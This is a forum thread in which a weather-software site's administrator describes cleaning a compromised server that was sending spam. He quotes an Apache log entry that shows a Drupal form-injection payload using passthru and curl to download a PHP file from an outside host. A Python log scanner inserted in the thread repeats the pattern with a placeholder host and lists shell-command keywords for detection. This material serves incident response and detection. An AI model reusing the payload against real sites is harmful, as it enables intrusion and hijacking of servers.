Site going down.

Talk about anything that doesn't fit elsewhere - PLEASE don't put Cumulus queries in here!
ConligWX
Posts: 1570
Joined: Mon 19 May 2014 10:45 pm
Weather Station: Davis vPro2+ w/DFARS + AirLink
Operating System: Ubuntu 22.04 LTS
Location: Bangor, NI

Re: Site going down.

Post by ConligWX »

Let's hope you've fixed it so you and the wife can get on with the holiday.
Regards Simon

https://www.conligwx.org - @conligwx
Davis Vantage Pro2 Plus with Daytime FARS • WeatherLink Live • Davis AirLink • PurpleAir •

Matt.j5b
Posts: 512
Joined: Mon 28 Nov 2011 2:13 am
Weather Station: Davis VP2/ WLL with DFARS
Operating System: RPi Raspbian (Buster)
Location: Ferny Grove, Brisbane, Australia

Re: Site going down.

Post by Matt.j5b »

It's good to hear you have been making progress and thanks for trying to resolve this. It's a horrible shame how low some people are in what they do to cause trouble. Hopefully you have fixed the issue and you do enjoy your holiday. :)
Regards, Matt of Brisbane, Australia
Ferny Grove Weather
jlmr731
Posts: 225
Joined: Sat 27 Aug 2016 12:11 am
Weather Station: Davis vantage pro 2
Operating System: Debian
Location: Wickliffe, Ohio

Re: Site going down.

Post by jlmr731 »

Any chance that you can give us a little insight on the script they used to keep it running, or what one should look for?
It may be helpful for others to know what to do if they have this problem, to stop these script kiddies.

Thanks Steve for your hard work getting this problem resolved while on holiday.
steve
Cumulus Author
Posts: 26702
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Post by steve »

I don't really have much to offer, I just deleted installations of things like Wordpress and Drupal which hadn't been kept up to date. This entry (and others similar) in the apache log looked suspicious (thanks go to Ken for suggesting that a suspicious POST was something to look for) and from googling it appeared to be related to a Drupal vulnerability:

85.126.200.23 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/.htaccess+htaccessx;curl+-o+sites/default/api.php+'http://saint-laurent-gorre.fr/_inc/_phpThumb/demit.aff' HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36"

I realised that I had been wrong about the spam not coming from the server when I had turned off all the legitimate sources of email and there were still smtp connections being made. I also had a number of (supposedly) exim processes running, and I don't have exim installed. Some malware disguises itself as exim, amongst other things.

It makes you realise that Linux is no more secure than Windows unless you really know what you're doing and keep on top of vulnerability notices and keep everything up to date. Although I believe this incident was my fault for not keeping things up to date, I do now regret allowing some users to install things like PHPBB and Wordpress.
Steve
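As an added illustration (this is not code from the post or from the Cumulus project), here is one way to do what Ken suggested and Steve did by eye: scan an Apache access log for POST requests whose query string carries Drupal Form API render-array keys (`%23post_render`, `%23type`, `%23markup`) and shell-command hints such as `passthru` or `curl`, which is the shape of the log entry quoted above. The parser assumes the Apache "combined" log format; the sample lines are constructed, and the third one reproduces the injection pattern from the quoted entry with the payload host replaced by a placeholder.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" log format (the format of the entry quoted in the post).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Drupal Form API keys that should never arrive from a browser. They show up
# (percent-encoded as %23...) when a request tries to inject a render array.
RENDER_KEYS = ("#post_render", "#pre_render", "#lazy_builder", "#type", "#markup")
# Substrings that suggest a shell command was smuggled into a form value.
SHELL_HINTS = ("passthru", "system(", "exec(", "curl ", "wget ", "chmod ")


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def suspicious_reasons(entry):
    """List the reasons a parsed POST looks like a Form API injection (empty = clean)."""
    reasons = []
    if entry["method"] != "POST":
        return reasons
    # Decode %23 -> '#' and '+' -> ' ' so the markers can be matched as written.
    decoded = unquote_plus(entry["target"])
    for key in RENDER_KEYS:
        if key in decoded:
            reasons.append(f"form-api key {key}")
    for hint in SHELL_HINTS:
        if hint in decoded:
            reasons.append(f"shell hint {hint.strip()}")
    if "user/password" in decoded and "name[" in decoded:
        reasons.append("array param injected into password-reset form")
    return reasons


def scan(lines):
    """Return (ip, timestamp, reasons) for every line that looks suspicious."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # not combined format (or a truncated line); skip it
        reasons = suspicious_reasons(entry)
        if reasons:
            hits.append((entry["ip"], entry["ts"], reasons))
    return hits


# Constructed sample log: two benign requests and one injection attempt modelled on
# the quoted entry. IPs are documentation addresses; the payload host is a placeholder.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Oct/2018:04:40:01 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Oct/2018:04:40:09 +0200] "POST /user/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password'
    '&name[%23post_render][]=passthru&name[%23type]=markup'
    '&name[%23markup]=curl+-o+sites/default/api.php+\'http://malware.example/x.txt\' HTTP/1.1"'
    ' 200 8120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, reasons in scan(SAMPLE_LOG):
        print(f"{ip} [{ts}]: " + "; ".join(reasons))
```

To run it over a real log, replace `SAMPLE_LOG` with `open("/var/log/apache2/access.log")`; the matching is deliberately broad (any `#`-prefixed Form API key in a POST), so expect to review hits rather than block on them.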
RayProudfoot
Posts: 3372
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England

Re: Site going down.

Post by RayProudfoot »

Steve, thanks for the update. Way over my head I’m afraid. Does this now mean the malware is no more and the hosting company have removed the threat of closure?
Cheers,
Ray, Cheshire.

steve
Cumulus Author
Posts: 26702
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Post by steve »

I believe the malware is no more, although there is still a slight oddity to be explained, but this apparently is not doing any harm. Hetzner are going to review after two days. After which I will re-enable the outgoing smtp port so that mail from the forum will start working again, and hopefully the server will eventually stop being flagged as a risk - I’ve noticed in the mail logs that some destinations are refusing mail from us.
Steve
RayProudfoot
Posts: 3372
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England

Re: Site going down.

Post by RayProudfoot »

Thanks Steve. I’m breathing a huge sigh of relief. Things looked very bleak over the weekend but you’ve done a great job in sorting things out aided by Ken. :clap:
Cheers,
Ray, Cheshire.

hornychz
Posts: 10
Joined: Mon 11 May 2015 3:54 pm
Weather Station: WeatherDuino Pro2
Operating System: Raspbian Wheezy
Location: Brandys nad Labem - Stara Boleslav, Czech republic

Re: Site going down.

Post by hornychz »

:clap: :)
ConligWX
Posts: 1570
Joined: Mon 19 May 2014 10:45 pm
Weather Station: Davis vPro2+ w/DFARS + AirLink
Operating System: Ubuntu 22.04 LTS
Location: Bangor, NI

Re: Site going down.

Post by ConligWX »

It sounds more like a PHP injection vulnerability than Linux itself being hacked. PHP CMSs are plagued with security holes, and only by updating them when updates are released can you try to secure a site.

Steve, on that note you would be advised to update phpBB. You're running a version that needs updating ;)

pm sent...
Regards Simon

https://www.conligwx.org - @conligwx
Davis Vantage Pro2 Plus with Daytime FARS • WeatherLink Live • Davis AirLink • PurpleAir •

RayProudfoot
Posts: 3372
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England

Re: Site going down.

Post by RayProudfoot »

Not sure if this is related or not, but when I log into my account with FileZilla it notifies me the certificate has expired. Is that a potential area of concern?
Cheers,
Ray, Cheshire.

steve
Cumulus Author
Posts: 26702
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Post by steve »

I created a dummy certificate when I enabled secure ftp on the server when testing the code I added to Cumulus MX. Filezilla will try to use secure ftp in preference and will get the dummy certificate. I suppose I should really disable secure ftp on the server, I get asked about this regularly. The last time I was asked, I forgot how it was supposed to work, and broke the server for a short time trying to fix something that didn’t need fixing!

At some point I may look into getting a proper certificate, now that they can be had for free.

(Short answer: no :) )
Steve
RayProudfoot
Posts: 3372
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England

Re: Site going down.

Post by RayProudfoot »

Thanks Steve. Not a major issue for me but given recent events thought it worth asking. I imagine you're feeling a lot better now! Time for a beer or two! :D
Cheers,
Ray, Cheshire.

steve
Cumulus Author
Posts: 26702
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Post by steve »

The spam has started again. I have blocked outgoing traffic on port 25 and will investigate when I get home, I've had enough of this for now.

I strongly advise anyone whose web site is on this server to start making alternative arrangements. I will refund any payments made, pro-rata, on request to steve@nybbles.co.uk
Steve
saratogaWX
Posts: 1170
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA

Re: Site going down.

Post by saratogaWX »

Ouch. I’ll be glad to analyze the logs again, Steve.

Best regards,
Ken
steve
Cumulus Author
Posts: 26702
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Post by steve »

Thanks, Ken, when I get chance I’ll zip them up for you.
Steve